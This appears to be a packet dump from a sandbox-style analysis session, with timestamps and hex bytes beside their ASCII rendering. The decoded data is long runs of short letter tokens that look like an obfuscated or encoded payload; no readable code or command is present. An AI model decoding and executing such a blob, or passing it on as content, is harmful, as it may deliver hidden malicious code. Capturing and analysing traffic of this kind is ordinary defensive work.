                                                                                                                          2021-10-29 15:06:45 UTC1362INData Raw: 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 73 20 50 50 6c 20 4c 42 20 50 50 73 20 50 6c 7a 20 73 4f 55 20 57 6b 20 42 6b 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 50 4f 20 57 6b 20 50 42 57 20 50 73 55 20 50 50 4f 20 50 73 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 73 20 50 50 4f 20 50 6c 4f 20 50 4f 6b 20 50 50 73 20 4f 55 20 57 7a 20 57 6b 20 57 4f 20 7a 57 20 50 6b 57 20 42 55 20 50 6b 4f 20 50 50 73 20 50 6b 7a 20 4f 55 20 57 6b 20 57 4f 20 4f 20 50 50 4f 20 50 50 6c 20 50 73 4f 20 4c 20 50 4f 55 20 4f 7a 20 57 6b 20 42 6b 20 55 4f 20 50 6b 55 20 6c 6b 20 73 73 4f 20 4f 73 20 57 6b 20 4f 7a 20 57 50 20 50 55 20 50 4c 73 20 50 42 57 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 42 20 6c 20 57 6b 20 57 4f
                                                                                                                          Data Ascii: z Wk WO zO PPs PPl LB PPs Plz sOU Wk Bk zO PPO PPl PkU PPO Wk PPO Wk PBW PsU PPO Psl PkU PPs Wk Oz Wk WO zs PPO PlO POk PPs OU Wz Wk WO zW PkW BU PkO PPs Pkz OU Wk WO O PPO PPl PsO L POU Oz Wk Bk UO PkU lk ssO Os Wk Oz WP PU PLs PBW PPl PkU PPB sB l Wk WO
                                                                                                                          2021-10-29 15:06:45 UTC1366INData Raw: 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 7a 7a 20 50 50 73 20 57 6b 20 57 7a 20 57 73 20 4f 50 20 55 6b 20 73 57 57 20 4f 6c 20 50 6b 55 20 50 50 73 20 57 50 20 73 50 20 73 73 42 20 73 4f 57 20 7a 4f 20 50 50 4f 20 50 50 4c 20 42 55 20 6c 50 20 57 6b 20 4f 7a 20 57 42 20 42 55 20 50 6b 7a 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 4c 50 20 73 73 6c 20 4f 7a 20 57 6b 20 42 6b 20 4c 55 20 73 50 4c 20 50 50 6c 20 50 6b 55 20 50 73 73 20 57 6c 20 57 4c 20 4c 6b 20 42 73 20 7a 50 20 73 57 73 20 7a 55 20 50 6b 57 20 50 50 42 20 4f 55 20 50 20 4f 7a 20 4f 55 20 50 73 42 20 50 50 4f 20 50 50 55 20 42 55 20 50 42 73 20 57 6b 20 4f 7a 20 57 42 20 57 7a 20 42 42 20 50 73 6c 20 6c 6c 20 50 73 4f 20 50 50 4c 20 57 6b 20 4f 7a 20 57 7a 20 42 4c 20 73 6b 42 20 55 6c 20 50 50
                                                                                                                          Data Ascii: O zO Psk sB Pzz PPs Wk Wz Ws OP Uk sWW Ol PkU PPs WP sP ssB sOW zO PPO PPL BU lP Wk Oz WB BU Pkz PPO PPl PkL LP ssl Oz Wk Bk LU sPL PPl PkU Pss Wl WL Lk Bs zP sWs zU PkW PPB OU P Oz OU PsB PPO PPU BU PBs Wk Oz WB Wz BB Psl ll PsO PPL Wk Oz Wz BL skB Ul PP
                                                                                                                          2021-10-29 15:06:45 UTC1370INData Raw: 4f 20 73 6b 20 7a 42 20 50 50 4c 20 7a 20 55 4f 20 50 50 73 20 57 6b 20 57 73 20 73 4f 20 4f 6b 20 7a 42 20 55 20 42 57 20 50 6b 55 20 50 50 73 20 57 4f 20 73 42 20 50 42 20 57 73 20 7a 6c 20 50 57 20 42 57 20 50 6b 55 20 50 50 73 20 57 4f 20 73 42 20 4f 4f 20 57 73 20 4f 6c 20 6c 50 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 4f 20 50 7a 20 4f 7a 20 57 4c 20 4f 50 20 6c 50 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 4f 20 4f 42 20 4f 7a 20 6c 6c 20 55 7a 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 55 6b 20 50 42 20 57 6b 20 4f 55 20 6c 57 20 55 7a 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 55 6b 20 4f 4f 20 57 6b 20 6c 4c 20 50 20 7a 4f 20 50 50 4f 20 50 50 4c 20 6c 50 20 7a 73 20 4f 7a 20 57 50 20 6c 55 20 50 20 7a 4f 20 50 50 4f 20 50 50 4c 20 6c 50 20 50 50 6b 20
                                                                                                                          Data Ascii: O sk zB PPL z UO PPs Wk Ws sO Ok zB U BW PkU PPs WO sB PB Ws zl PW BW PkU PPs WO sB OO Ws Ol lP PPl PkU PPB sO Pz Oz WL OP lP PPl PkU PPB sO OB Oz ll Uz PPO PPl PkW Uk PB Wk OU lW Uz PPO PPl PkW Uk OO Wk lL P zO PPO PPL lP zs Oz WP lU P zO PPO PPL lP PPk
                                                                                                                          2021-10-29 15:06:45 UTC1374INData Raw: 4c 20 50 57 20 50 50 73 20 57 6b 20 57 7a 20 73 4f 20 4f 6b 20 7a 42 20 55 20 55 20 50 6b 55 20 50 50 73 20 57 4f 20 73 42 20 50 42 20 57 73 20 7a 6c 20 50 57 20 55 20 50 6b 55 20 50 50 73 20 57 4f 20 73 42 20 4f 4f 20 57 73 20 4f 6c 20 50 57 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 4f 20 50 7a 20 4f 7a 20 57 4c 20 4f 50 20 50 57 20 50 50 6c 20 50 6b 55 20 50 50 42 20 73 4f 20 4f 42 20 4f 7a 20 6c 6c 20 4f 73 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 55 6b 20 50 42 20 57 6b 20 4f 55 20 6c 57 20 4f 73 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 55 6b 20 4f 4f 20 57 6b 20 73 42 20 7a 4f 20 7a 4f 20 50 50 4f 20 50 73 6c 20 6c 50 20 50 50 6b 20 4f 7a 20 6c 57 20 6c 6c 20 57 4f 20 7a 4f 20 50 50 7a 20 55 57 20 6c 55 20 50 50 4f 20 4f 55 20 6c 6c 20 6c 6c 20 57 4f 20
                                                                                                                          Data Ascii: L PW PPs Wk Wz sO Ok zB U U PkU PPs WO sB PB Ws zl PW U PkU PPs WO sB OO Ws Ol PW PPl PkU PPB sO Pz Oz WL OP PW PPl PkU PPB sO OB Oz ll Os PPO PPl PkW Uk PB Wk OU lW Os PPO PPl PkW Uk OO Wk sB zO zO PPO Psl lP PPk Oz lW ll WO zO PPz UW lU PPO OU ll ll WO
                                                                                                                          2021-10-29 15:06:45 UTC1378INData Raw: 57 4f 20 7a 4f 20 50 73 6b 20 50 42 55 20 50 6c 55 20 50 50 57 20 73 6b 20 73 4c 7a 20 57 6b 20 4c 42 20 7a 42 20 55 6b 20 73 50 57 20 50 6b 7a 20 50 50 73 20 57 42 20 50 6b 20 50 73 6b 20 73 6b 50 20 50 6c 50 20 50 4f 50 20 50 6c 50 20 55 55 20 55 7a 20 4f 7a 20 73 6b 42 20 4c 42 20 50 50 4f 20 7a 4f 20 50 50 4f 20 50 50 6b 20 73 20 50 73 4c 20 57 6b 20 4f 7a 20 57 42 20 73 4c 4f 20 7a 42 20 50 20 73 4c 7a 20 50 6b 7a 20 50 50 73 20 57 73 20 4c 57 20 57 7a 20 4c 55 20 55 73 20 55 6b 20 55 20 50 6b 55 20 50 50 73 20 57 42 20 57 57 20 55 4c 20 50 6c 6c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 73 20 6b 20 57 6b 20 4f 7a 20 57 42 20 7a 55 20 73 4f 42 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 6c 20 57 7a 20 4f 6c 20 73 6b 20 50 7a 6c 20 50 4f 20 50 50 4f 20 50 50
                                                                                                                          Data Ascii: WO zO Psk PBU PlU PPW sk sLz Wk LB zB Uk sPW Pkz PPs WB Pk Psk skP PlP POP PlP UU Uz Oz skB LB PPO zO PPO PPk s PsL Wk Oz WB sLO zB P sLz Pkz PPs Ws LW Wz LU Us Uk U PkU PPs WB WW UL Pll zO PPO Psl s k Wk Oz WB zU sOB PPW PPl Pkl Ul Wz Ol sk Pzl PO PPO PP
                                                                                                                          2021-10-29 15:06:45 UTC1381INData Raw: 50 50 7a 20 57 6b 20 4c 6b 20 57 4f 20 50 4c 6b 20 6c 7a 20 50 50 42 20 50 50 6c 20 6c 6c 20 50 50 42 20 50 4c 4f 20 4f 73 20 73 55 20 57 4f 20 4c 55 20 6c 6b 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 57 6b 20 50 4c 55 20 73 55 20 7a 6b 20 50 73 6b 20 50 50 42 20 50 50 6c 20 6c 55 20 7a 73 20 7a 4f 20 73 7a 20 57 73 20 57 4f 20 50 4c 4f 20 50 50 4c 20 50 55 20 42 57 20 50 50 7a 20 57 6b 20 50 4f 6b 20 57 73 20 7a 6b 20 50 73 6b 20 50 50 42 20 50 50 6c 20 73 73 20 7a 57 20 50 6c 57 20 57 20 42 6b 20 57 4f 20 73 4f 6b 20 42 6c 20 50 6c 57 20 6c 6b 20 50 50 7a 20 57 6b 20 73 73 6b 20 50 20 42 42 20 50 50 6b 20 50 50 42 20 50 50 6c 20 73 57 73 20 7a 6b 20 7a 4f 20 73 7a 20 42 6b 20 57 4f 20 50 6c 6c 20 50 6b 55 20 50 6c 57 20 6c 6b 20 50 50 7a 20 57 6b 20 50 6c
                                                                                                                          Data Ascii: PPz Wk Lk WO PLk lz PPB PPl ll PPB PLO Os sU WO LU lk PPl PkU PPz Wk PLU sU zk Psk PPB PPl lU zs zO sz Ws WO PLO PPL PU BW PPz Wk POk Ws zk Psk PPB PPl ss zW PlW W Bk WO sOk Bl PlW lk PPz Wk ssk P BB PPk PPB PPl sWs zk zO sz Bk WO Pll PkU PlW lk PPz Wk Pl
                                                                                                                          2021-10-29 15:06:45 UTC1386INData Raw: 50 50 4f 20 50 73 4f 20 50 6b 55 20 73 4c 20 57 6b 20 4f 55 20 57 50 20 57 4f 20 7a 4f 20 50 7a 50 20 6c 4c 20 50 6b 55 20 50 50 73 20 55 57 20 4f 7a 20 57 55 20 57 4f 20 73 50 4c 20 50 50 4f 20 73 4f 4f 20 50 6b 55 20 55 42 20 57 6b 20 50 6c 42 20 50 6c 20 57 4f 20 7a 4f 20 55 50 20 50 50 6c 20 50 6b 6b 20 50 50 73 20 50 7a 4c 20 4f 7a 20 50 6c 55 20 57 57 20 42 7a 20 50 50 4f 20 42 7a 20 4f 42 20 50 50 73 20 57 6b 20 73 57 20 57 6b 20 42 50 20 7a 4f 20 73 4f 55 20 50 50 6c 20 73 4c 42 20 50 50 4c 20 4c 4f 20 4f 7a 20 50 6c 7a 20 6c 20 7a 4f 20 50 50 4f 20 55 73 20 50 6b 55 20 50 73 4c 20 57 6b 20 50 7a 7a 20 57 6b 20 50 7a 4c 20 7a 57 20 55 7a 20 50 50 6c 20 50 42 57 20 7a 7a 20 57 6b 20 4f 7a 20 73 6c 20 57 4f 20 55 57 20 50 50 4f 20 73 4f 7a 20 50 6b
                                                                                                                          Data Ascii: PPO PsO PkU sL Wk OU WP WO zO PzP lL PkU PPs UW Oz WU WO sPL PPO sOO PkU UB Wk PlB Pl WO zO UP PPl Pkk PPs PzL Oz PlU WW Bz PPO Bz OB PPs Wk sW Wk BP zO sOU PPl sLB PPL LO Oz Plz l zO PPO Us PkU PsL Wk Pzz Wk PzL zW Uz PPl PBW zz Wk Oz sl WO UW PPO sOz Pk
                                                                                                                          2021-10-29 15:06:45 UTC1390INData Raw: 20 50 50 4f 20 4c 4c 20 4f 55 20 57 6b 20 57 4f 20 50 6b 20 50 73 4c 20 50 50 6c 20 50 6b 55 20 4f 50 20 57 50 20 73 6b 20 57 50 20 50 55 20 7a 42 20 55 6c 20 50 50 42 20 50 6b 55 20 50 50 73 20 6c 50 20 42 4c 20 57 6b 20 57 4f 20 50 4c 20 50 50 57 20 7a 50 20 50 6b 7a 20 7a 57 20 4f 7a 20 4c 57 20 57 50 20 57 4f 20 7a 4f 20 73 4f 42 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 6b 6c 20 4f 55 20 73 73 20 57 57 20 50 50 4c 20 50 50 73 20 50 6b 73 20 50 6b 7a 20 50 50 73 20 57 6b 20 57 4c 20 57 57 20 57 4f 20 7a 4f 20 4f 4c 20 50 50 42 20 6c 4c 20 50 50 4c 20 73 4c 20 57 6b 20 4c 4c 20 57 57 20 7a 4f 20 50 50 4f 20 73 4c 50 20 55 7a 20 50 50 73 20 57 6b 20 50 6b 57 20 57 50 20 50 7a 20 7a 57 20 7a 6c 20 50 50 55 20 50 73 42 20 50 50 4c 20 57 6b 20 4f 7a 20 73
                                                                                                                          Data Ascii: PPO LL OU Wk WO Pk PsL PPl PkU OP WP sk WP PU zB Ul PPB PkU PPs lP BL Wk WO PL PPW zP Pkz zW Oz LW WP WO zO sOB PPl PkU PPs Pkl OU ss WW PPL PPs Pks Pkz PPs Wk WL WW WO zO OL PPB lL PPL sL Wk LL WW zO PPO sLP Uz PPs Wk PkW WP Pz zW zl PPU PsB PPL Wk Oz s
                                                                                                                          2021-10-29 15:06:45 UTC1394INData Raw: 50 50 20 50 6b 55 20 50 50 4c 20 57 6b 20 4c 57 20 4f 42 20 50 4f 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 7a 4c 20 50 6b 7a 20 57 73 20 4c 4c 20 57 50 20 57 4f 20 4c 42 20 50 50 50 20 50 6b 20 50 73 4f 20 50 50 4c 20 57 6b 20 50 7a 42 20 4f 6c 20 50 4f 4f 20 7a 4f 20 42 57 20 50 50 42 20 73 73 73 20 50 73 42 20 50 7a 73 20 4c 4c 20 50 20 57 57 20 50 73 20 55 7a 20 73 57 73 20 50 73 4f 20 42 6c 20 57 50 20 42 4f 20 4c 7a 20 50 6c 7a 20 42 55 20 42 57 20 50 50 42 20 50 50 6b 20 50 50 55 20 50 7a 7a 20 4c 4c 20 50 20 57 57 20 50 6c 4f 20 50 73 6c 20 73 4c 6b 20 50 73 4f 20 42 6c 20 57 50 20 50 55 42 20 57 42 20 50 6c 4f 20 42 55 20 42 57 20 50 50 42 20 73 4c 50 20 50 73 42 20 50 6c 57 20 4c 4c 20 50 20 57 57 20 73 50 4c 20 55 7a 20 73 50 57 20 50 73 4f 20 42
                                                                                                                          Data Ascii: PP PkU PPL Wk LW OB POO zO PPW PPl zL Pkz Ws LL WP WO LB PPP Pk PsO PPL Wk PzB Ol POO zO BW PPB sss PsB Pzs LL P WW Ps Uz sWs PsO Bl WP BO Lz Plz BU BW PPB PPk PPU Pzz LL P WW PlO Psl sLk PsO Bl WP PUB WB PlO BU BW PPB sLP PsB PlW LL P WW sPL Uz sPW PsO B
                                                                                                                          2021-10-29 15:06:45 UTC1398INData Raw: 4f 20 50 6c 7a 20 50 50 57 20 50 6c 6c 20 6c 7a 20 50 50 4c 20 57 6b 20 42 20 57 6b 20 7a 73 20 50 6b 55 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 42 4f 20 4f 7a 20 73 73 4c 20 55 20 50 7a 6b 20 55 6c 20 42 6c 20 50 6b 55 20 50 55 73 20 50 50 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 73 73 6c 20 50 50 6c 20 50 73 7a 20 6c 55 20 73 50 4c 20 4c 57 20 50 6b 20 57 4f 20 50 73 20 6c 73 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 50 6c 6c 20 57 6b 20 55 6c 20 50 6b 57 20 50 4c 6b 20 50 6b 73 20 7a 6c 20 50 50 73 20 50 4f 20 50 50 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 4f 4f 20 50 6b 55 20 73 50 6c 20 73 50 20 73 6b 6c 20 4c 4c 20 55 20 7a 4f 20 50 4f 20 6c 7a 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 6c 55 20 57 4f 20 50 7a 42 20 42 6c
                                                                                                                          Data Ascii: O Plz PPW Pll lz PPL Wk B Wk zs PkU PPO PPl PkU PPs PBO Oz ssL U Pzk Ul Bl PkU PUs PP Oz Wk WO zO ssl PPl Psz lU sPL LW Pk WO Ps ls PPl PkU PPs Wk Pll Wk Ul PkW PLk Pks zl PPs PO PP Wk WO zO PPO sOO PkU sPl sP skl LL U zO PO lz PkU PPs Wk Oz PlU WO PzB Bl
                                                                                                                          2021-10-29 15:06:45 UTC1402INData Raw: 50 6b 42 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 73 57 50 20 50 50 73 20 50 6b 4c 20 4f 42 20 73 73 4c 20 4c 4f 20 50 4f 4c 20 50 50 4f 20 50 6b 57 20 57 4c 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 50 42 6b 20 7a 4f 20 50 73 55 20 50 50 57 20 50 73 7a 20 50 6b 6b 20 73 4c 42 20 4f 7a 20 7a 20 50 50 6b 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 73 4c 6b 20 57 6b 20 4c 57 20 4c 20 73 50 55 20 42 4f 20 50 4f 6c 20 50 50 6c 20 4c 4c 20 4f 6b 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 50 55 4f 20 50 50 4f 20 4c 20 4f 4f 20 50 57 6c 20 4c 7a 20 73 50 73 20 57 6b 20 50 6b 4f 20 50 73 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 42 4f 20 4f 7a 20 50 50 6b 20 4f 55 20 50 7a 57 20 50 6b 73 20 50 4f 42 20 50 6b 55 20 4f 20 50 6b 42 20 4f 7a 20 57 6b
                                                                                                                          Data Ascii: PkB WO zO PPO PPl sWP PPs PkL OB ssL LO POL PPO PkW WL PPs Wk Oz Wk PBk zO PsU PPW Psz Pkk sLB Oz z PPk zO PPO PPl PkU sLk Wk LW L sPU BO POl PPl LL Ok Wk Oz Wk WO PUO PPO L OO PWl Lz sPs Wk PkO Ps PPO PPl PkU PPs PBO Oz PPk OU PzW Pks POB PkU O PkB Oz Wk
                                                                                                                          2021-10-29 15:06:45 UTC1406INData Raw: 55 55 20 4c 4c 20 50 50 4c 20 57 6b 20 50 7a 4c 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 73 6c 20 50 6b 55 20 50 42 55 20 73 4f 20 4c 7a 20 4c 42 20 50 73 6b 20 7a 57 20 73 4f 50 20 73 4f 73 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 42 4f 20 42 73 20 73 55 20 50 6b 6c 20 50 6b 4f 20 50 73 4c 20 42 4c 20 57 50 20 50 73 7a 20 50 7a 50 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 73 57 50 20 50 50 73 20 55 42 20 4f 50 20 50 6c 20 4c 73 20 73 6c 20 50 50 57 20 50 4c 4c 20 73 4c 4f 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 50 42 6b 20 7a 4f 20 4f 50 20 50 6b 7a 20 50 7a 6b 20 50 73 57 20 55 7a 20 4f 55 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 4f 57 20 50 6b 55 20 73 73 57 20 50 7a 20 73 50 42 20 7a 20 73 7a 20 42 42 20 4c 57 20 50 50 42 20 50 6b
                                                                                                                          Data Ascii: UU LL PPL Wk PzL Wk WO zO PPO ssl PkU PBU sO Lz LB Psk zW sOP sOs PkU PPs Wk Oz PBO Bs sU Pkl PkO PsL BL WP Psz PzP WO zO PPO PPl sWP PPs UB OP Pl Ls sl PPW PLL sLO PPs Wk Oz Wk PBk zO OP Pkz Pzk PsW Uz OU Wk WO zO PPO sOW PkU ssW Pz sPB z sz BB LW PPB Pk
                                                                                                                          2021-10-29 15:06:45 UTC1410INData Raw: 73 50 6b 20 50 73 73 20 50 6c 57 20 50 6b 6c 20 55 42 20 57 6b 20 50 7a 6c 20 57 50 20 73 57 6b 20 73 4f 57 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 7a 6b 20 57 42 20 50 4c 57 20 42 73 20 73 73 55 20 50 6b 6b 20 73 4f 55 20 50 6b 7a 20 50 42 4f 20 50 4f 6c 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 73 4f 4f 20 50 73 57 20 73 6b 7a 20 50 73 6b 20 50 4c 6c 20 4c 7a 20 50 55 6b 20 57 57 20 50 4c 6c 20 73 50 50 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 50 7a 73 20 57 7a 20 50 6b 20 55 57 20 50 7a 6b 20 55 55 20 73 73 4f 20 50 50 4c 20 73 50 57 20 50 4f 57 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 4f 4c 20 50 6b 50 20 57 73 20 57 6c 20 73 73 4f 20 4c 42 20 50 7a 6c 20 7a 57 20 50 57 42 20 73 50 73 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20
                                                                                                                          Data Ascii: sPk Pss PlW Pkl UB Wk Pzl WP sWk sOW PPO PPl PkU PPs Pzk WB PLW Bs ssU Pkk sOU Pkz PBO POl Oz Wk WO zO sOO PsW skz Psk PLl Lz PUk WW PLl sPP PPl PkU PPs Wk Pzs Wz Pk UW Pzk UU ssO PPL sPW POW Wk WO zO PPO sOL PkP Ws Wl ssO LB Pzl zW PWB sPs PkU PPs Wk Oz
                                                                                                                          2021-10-29 15:06:45 UTC1413INData Raw: 73 20 50 7a 7a 20 50 73 4f 20 50 6b 6c 20 57 6b 20 50 57 42 20 57 50 20 50 4f 73 20 73 4f 50 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 7a 6b 20 57 42 20 73 73 6c 20 4c 55 20 73 55 20 50 50 55 20 73 50 6c 20 50 6b 7a 20 50 6c 6c 20 50 57 50 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 73 4f 4f 20 50 73 57 20 50 50 57 20 50 50 73 20 50 6c 4c 20 4c 6c 20 50 57 55 20 57 57 20 50 57 6c 20 73 50 57 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 50 7a 73 20 57 7a 20 50 6c 20 7a 4f 20 73 50 4c 20 55 42 20 50 55 73 20 50 50 4c 20 73 73 4f 20 50 4f 55 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 4f 4c 20 50 6b 50 20 50 6b 42 20 4f 55 20 50 6c 57 20 4c 55 20 50 57 73 20 7a 57 20 50 42 7a 20 73 6b 7a 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 7a 6b 20 42
                                                                                                                          Data Ascii: s Pzz PsO Pkl Wk PWB WP POs sOP PPO PPl PkU PPs Pzk WB ssl LU sU PPU sPl Pkz Pll PWP Oz Wk WO zO sOO PsW PPW PPs PlL Ll PWU WW PWl sPW PPl PkU PPs Wk Pzs Wz Pl zO sPL UB PUs PPL ssO POU Wk WO zO PPO sOL PkP PkB OU PlW LU PWs zW PBz skz PkU PPs Wk Oz Pzk B
                                                                                                                          2021-10-29 15:06:45 UTC1418INData Raw: 55 20 55 73 20 55 7a 20 50 50 6c 20 50 55 6b 20 50 50 4c 20 50 6c 20 50 57 4c 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 73 4f 4c 20 50 6b 50 20 6c 42 20 57 6c 20 73 4f 55 20 57 6b 20 73 73 42 20 7a 57 20 7a 55 20 73 73 6b 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 7a 6b 20 42 73 20 50 42 20 50 73 50 20 50 6b 50 20 50 6b 55 20 50 42 4f 20 57 50 20 4f 20 50 57 57 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 73 4c 57 20 50 73 6b 20 73 4c 57 20 42 6b 20 73 57 50 20 57 4f 20 50 73 55 20 50 50 57 20 6c 4c 20 50 55 42 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 50 6c 42 20 55 73 20 50 4f 6c 20 50 73 50 20 50 73 57 20 50 50 73 20 73 4c 50 20 4f 55 20 50 50 55 20 50 57 55 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 73 4f 42 20 57 7a 20 50 50 20 42 6b 20 73
                                                                                                                          Data Ascii: U Us Uz PPl PUk PPL Pl PWL Wk WO zO PPO sOL PkP lB Wl sOU Wk ssB zW zU ssk PkU PPs Wk Oz Pzk Bs PB PsP PkP PkU PBO WP O PWW WO zO PPO PPl sLW Psk sLW Bk sWP WO PsU PPW lL PUB PPs Wk Oz Wk PlB Us POl PsP PsW PPs sLP OU PPU PWU zO PPO PPl PkU sOB Wz PP Bk s
                                                                                                                          2021-10-29 15:06:45 UTC1422INData Raw: 6c 20 4f 57 20 50 50 55 20 73 4c 42 20 73 50 55 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 73 50 6b 20 50 6b 42 20 50 50 20 7a 55 20 50 50 6c 20 57 6b 20 7a 6b 20 4f 7a 20 50 57 6b 20 73 57 57 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 73 50 50 20 4f 55 20 50 4c 50 20 73 50 20 7a 57 20 50 50 4f 20 73 6b 20 50 50 50 20 73 50 73 20 50 57 4c 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 4f 6c 20 50 50 42 20 50 6c 57 20 4f 7a 20 4f 50 20 4f 7a 20 7a 4c 20 57 73 20 4f 20 73 73 4c 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 73 6b 55 20 57 55 20 4c 55 20 50 6b 6c 20 73 6b 4c 20 50 6b 55 20 50 73 20 50 50 4f 20 50 6b 42 20 50 57 6c 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 4f 7a 20 50 6b 7a 20 73 55 20 50 57 20 4f 55 20 57 6b 20 7a 6c 20 7a 42 20 4f 57 20
                                                                                                                          Data Ascii: l OW PPU sLB sPU Wk Oz Wk WO sPk PkB PP zU PPl Wk zk Oz PWk sWW PPO PPl PkU PPs sPP OU PLP sP zW PPO sk PPP sPs PWL Oz Wk WO zO POl PPB PlW Oz OP Oz zL Ws O ssL PPl PkU PPs Wk skU WU LU Pkl skL PkU Ps PPO PkB PWl Wk WO zO PPO POz Pkz sU PW OU Wk zl zB OW
                                                                                                                          2021-10-29 15:06:45 UTC1426INData Raw: 50 50 4f 20 57 6b 20 50 4f 55 20 50 6b 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 50 7a 20 6c 7a 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 4c 20 55 4c 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 4f 55 20 50 6b 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 50 7a 20 6c 7a 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 4c 20 55 4c 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 4f 55 20 50 6b 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 50 7a 20 6c 7a 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 4c 20 55 4c 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 4f 55 20 50 6b 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 50 7a 20 6c 7a 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 4c 20 55 4c 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 4f 55 20
                                                                                                                          Data Ascii: PPO Wk POU Pk WO zO PPL PPl PPz lz Wk Oz WP WO PL UL PPl PkU PPO Wk POU Pk WO zO PPL PPl PPz lz Wk Oz WP WO PL UL PPl PkU PPO Wk POU Pk WO zO PPL PPl PPz lz Wk Oz WP WO PL UL PPl PkU PPO Wk POU Pk WO zO PPL PPl PPz lz Wk Oz WP WO PL UL PPl PkU PPO Wk POU
                                                                                                                          2021-10-29 15:06:45 UTC1430INData Raw: 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 73 4f 6c 20 55 50 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 50 4f 6c 20 73 6c 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 73 6b 42 20 7a 55 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 55 20 7a 57 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 50 50 55 20 73 50 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 4f 73 20 7a 6c 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 55 20 7a 57 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 50 50 55 20 73 50 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 4c 4c 20 7a 55 20 57 6b 20 4f 7a 20 4f 7a 20 57 4f 20 73 50 57 20 55 50 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 50 50 55 20 73 50 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 4f 73 20 7a 6c 20 57 6b 20 4f 7a 20 57 50 20 57 4f
                                                                                                                          Data Ascii: Wk Oz WP WO sOl UP PPl PkU PPL Wk POl sl WO zO PPW PPl skB zU Wk Oz WP WO PU zW PPl PkU PPL Wk PPU sP WO zO PPW PPl Os zl Wk Oz WP WO PU zW PPl PkU PPL Wk PPU sP WO zO PPW PPl LL zU Wk Oz Oz WO sPW UP PPl PkU PPL Wk PPU sP WO zO PPW PPl Os zl Wk Oz WP WO
